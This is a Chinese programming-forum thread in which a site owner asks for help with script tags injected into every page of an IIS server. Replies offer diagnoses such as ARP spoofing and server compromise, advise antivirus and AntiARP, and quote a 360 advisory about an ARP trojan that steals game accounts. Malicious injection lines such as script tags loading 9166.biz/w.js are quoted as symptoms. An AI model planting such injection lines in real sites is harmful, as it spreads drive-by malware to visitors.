当前位置: 代码迷 >> ASP.NET >> 网站中js脚本注入病毒,救解决方案
  详细解决方案

网站中js脚本注入病毒,救解决方案

热度:8220   发布时间:2013-02-25 00:00:00.0
网站中js脚本注入病毒,急救
所有页面的开头,也就是最顶端,会插入类似 <script   src=http://aaa.bbb.ccc/js.js> </script>     这段代码,注:并不在真正的文件中添加这段代码的,而是通过iis输出后自己就会添加。整个服务器,包括asp,静态页面html,aspx都中了。我下载这段js代码后,里面代码这样的iframe一个页面,这个页面我再打开,他仍然嵌套4个iframe,每个iframe里面只有js代码,IE下就会抱木马,FF则无事。我也业研究过这些js代码,但是实在找不到查杀得方法,系统重装过,几乎所有杀毒软件都用过,都没有找到病毒。

大家有相同的经历吗?怎么解决阿?


------解决方案--------------------------------------------------------
没有遇见过,应该是你的服务器中毒了
重装也没有用吗?
------解决方案--------------------------------------------------------
是服务器有漏洞,被人上传了木马了,快杀吧
------解决方案--------------------------------------------------------
前几天发现腾讯的QQ相册头部被加入了类似的iframe。过了会QQ空间就打不开了。再过一会又好了。被攻击是很正常的。
------解决方案--------------------------------------------------------
用dreamweaver批量替换一下,限制一些目录的执行权限,一般asp程序容易被挂马。
------解决方案--------------------------------------------------------
在安全模式下,去杀,先用金山(内面的功能全来一面,什么木马专杀啊…………),再用卡巴
------解决方案--------------------------------------------------------
把你原来的程序也要查杀一遍。“而是通过iis输出后自己就会添加”,你如何证实的??


------解决方案--------------------------------------------------------



典型arp欺骗攻击


下载arp防火墙 装到服务器上就可以了 AntiARP



------解决方案--------------------------------------------------------
你是自己的服务器吗?应该是服务器中标了
你说的“而是通过iis输出后自己就会添加”我不太理解!
------解决方案--------------------------------------------------------
把js发出来看看
------解决方案--------------------------------------------------------
楼上正解
ARP木马病毒的恶意行为:
1.通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播。
专杀工具下载地址:http://dl.360safe.com/kill_arp.exe

------解决方案--------------------------------------------------------
瑞星可以杀这个病毒的,我就刚中过
------解决方案--------------------------------------------------------
给你顶~
人菜只能顶了
------解决方案--------------------------------------------------------
刚学习了,哈 
某种arp病毒弹出y66网页,并导致无法上网的分析与杀毒办法2007-06-14 08:15接到朋友的求助,今天早上一大早开机,就发现中了病毒了,无论访问哪个网站,都会带
网址为y66.us/2.js的网页 ,然后网页就不正常了,烦死了。他说他已经上网查了一下,说是一种arp病毒。下载了arp杀毒工具杀毒,没杀出毒来,又用Antiarp.exe防护,检测到局域网内的确有arp攻击,但防护好像不起作用,时好时坏,谁还有高招啊?急!

我的分解结果:
近日,360安全中心接到大量用户的举报,称全局域网的电脑中都出现了弹出5y5.us或9166.biz等网页,电脑被种植多个木马病毒,时常断网等现象。专杀工具下载地址:http://dl.360safe.com/kill_arp.exe

9166.biz ---ARP木马病毒的恶意行为:
1.通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播。
2.ARP攻击篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加 " <scrīpt src=http://9166.biz/w.js> </scrīpt> "等内容,从而使局域网
内有XML漏洞的电脑同时感染此病毒。
3.查杀困难,整个网络不时掉线:由于遭受攻击的局域网一般都是多台电脑感染,同时发起ARP攻击,因此整个局域网很不稳定,时常掉线甚至瘫痪。而且由于机器之间互相感染,因此彻底查杀及恢复非常困难。
4.后台下载多个热门游戏木马:该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马,偷窃用户游戏帐户。
据360安全中心专家分析,此ARP木马病毒已经导致了上百万台电脑感染,数万个局域网络频临瘫痪。360安全卫士已经在第一时间推出了专杀工具,供受害用户使用。同时,只要用户使用360安全卫士勤打系统补丁,就不会感染此木马病毒,防患于未然。
ARP病毒相关介绍连接:http://zhidao.baidu.com/question/5917597,9166.biz是该类ARP病毒的一个变种,其他变种的ARP病毒我们的专杀应该也可以查杀。

另外单位的网管应该结合自己单位的网络硬件情况采取对应措施,以我们单位为例,我一般都是用antiarp来拦截arp病毒攻击,顺便找出那个中毒机器的IP、真实mac,并对照手里的IP/mac对应表找出几楼那个办公室的那个人的机器,跑过去,拔网线打补丁杀毒。这个过程不要怕麻烦,就得一步步的做,有时候好几台机器同时中了arp病毒,也得都断网,一台台的打补丁杀毒。另外就是在防火墙上禁止内网用户访问那个y66的网站,防止继续下载木马

  相关解决方案